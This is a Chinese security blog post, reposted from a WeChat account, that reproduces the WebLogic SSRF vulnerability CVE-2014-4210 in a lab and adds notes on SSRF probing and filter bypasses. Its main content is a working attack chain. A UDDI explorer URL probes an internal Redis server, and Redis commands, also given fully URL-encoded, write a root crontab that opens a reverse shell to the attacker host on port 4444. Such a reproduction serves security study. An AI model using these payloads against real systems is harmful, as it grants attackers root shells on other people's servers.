复现Weblogic SSRF 漏洞(CVE-2014-4210)

admin 2024年11月27日23:08:07评论48 views字数 1272阅读4分14秒阅读模式

   最近在学习SSRF相关知识,本次复现的是Weblogic的SSRF 漏洞,配合redis通过计划任务写shell。正文之前感觉总结一下今天学到的SSRF玩法,首先是通过file协议探测内网主机文件,然后是通过http://或者dict://去探测内网内其他主机端口开放情况,或者CMS信息,然后是可以通过模拟提交请求,或者上传文件。(请求时要根据次数进行url编码,第一次要在%0A前加上%0D),最后提一嘴bypass,如果指定必须从哪里请求过来可以使用类似http://[email protected],如果对127有所过滤又可以用八进制,十进制,十六进制或者localhost进行绕过。。。。

靶机:192.168.234.142 攻击机:192.168.234.144

1.首先探测到6379redis数据库端口开着

http://192.168.234.142:7001/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://172.20.0.2:6379/

复现Weblogic SSRF 漏洞(CVE-2014-4210)

2.通过redis计划任务反弹shell

set 1 "nnnn* * * * * root bash -c 'sh -i >& /dev/tcp/192.168.234.144/4444 0>&1'nnnn"

config set dir /etc/

config set dbfilename crontab

save

Payload需要去url编码两次,第一次要将%0A前都加上%0D

http://192.168.234.142:7001/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://172.20.0.2:6379/test%0D%0A%0D%0Aset%201%20%22%5Cn%5Cn%5Cn%5Cn*%20*%20*%20*%20*%20root%20bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.234.144%2F4444%200%3E%261%5Cn%5Cn%5Cn%5Cn%22%0D%0Aconfig%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave%0D%0A%0D%0Aaaa%0D%0A

复现Weblogic SSRF 漏洞(CVE-2014-4210)

3. 攻击机起好监听,拿到权限。

复现Weblogic SSRF 漏洞(CVE-2014-4210)

原文始发于微信公众号(飞奔的狸花猫):复现Weblogic SSRF 漏洞(CVE-2014-4210)

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年11月27日23:08:07
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   复现Weblogic SSRF 漏洞(CVE-2014-4210)https://cn-sec.com/archives/2491241.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息